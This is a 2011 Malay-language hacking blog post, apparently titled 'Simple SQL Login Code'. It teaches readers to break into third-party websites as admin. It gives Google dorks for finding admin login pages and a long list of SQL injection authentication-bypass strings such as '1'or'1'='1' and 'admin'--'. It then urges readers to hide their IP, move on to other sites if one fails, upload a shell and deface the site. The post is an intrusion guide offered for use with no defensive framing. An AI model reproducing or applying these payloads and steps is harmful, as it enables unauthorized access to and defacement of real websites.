Sunday, 4 December 2011

Simple SQL Login Code






Assalamualaikum dan salam sejahtera....hari ini aku happy sangat sebab income dari nuffnang dah mula masuk!Baiklah dalam entry ni aku nak ajar korang hack yang dipanggil Simple SQL Login Code.Hack ni senang jer.Tengok tajuk pun dah tau simple kan?lol.

Dengan hack ni anda berupaya untuk login sebagai admin sesebuah website!!Jika berjaya anda mungkin akan dapat men-Deface website tersebut!Baiklah jom mula..... 



LANGKAH 1
Mula2 anda perlulah mencari admin login page terlebih dahulu.Gunakan Google Dork dibawah untuk mencari admin login page :


Dork :

inurl:admin.asp

inurl:login.asp

index of:/admin/login.asp


LANGKAH 2

Selepas anda menjumpai admin login page, anda boleh lah mencuba untuk login sebagai admin!


NOTE: JANGAN LUPA HIDE IP ANDA TERLEBIH DAHULU!


Cara-caranya :

Untuk USERNAME masukkan : admin

Untuk PASSWORD masukkan salah satu code2 dibawah :

CONTOH :

Username : admin
Password : 1'or'1'='1



Password Login Code :


1'or'1'='1

or

admin'--


' or 0=0 --


" or 0=0 --


or 0=0 --


' or 0=0 #


" or 0=0 #


or 0=0 #


' or 'x'='x


" or "x"="x


') or ('x'='x


' or 1=1--


" or 1=1--


or 1=1--


' or a=a--


" or "a"="a


') or ('a'='a


") or ("a"="a


hi" or "a"="a


hi" or 1=1 --


hi' or 1=1 --


hi' or 'a'='a


hi') or ('a'='a


hi") or ("a"="a


Note : jika tidak berjaya,cuba lagi dengan code2 lain atau cuba cari website lain.jangan putus asa!


LANGKAH 3

Setelah anda berjaya login sebagai admin, anda boleh lah mencari butang upload dan upload shell anda!Kemudian anda boleh lan deface!!

Bagi yg masih tidak faham.bolehlah rujuk video dibawah :





Baiklah sampai disini sahaja untuk tutorial kali ini.Semoga anda berjaya!!!Assalamualaikum....
Item Reviewed: Simple SQL Login Code Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com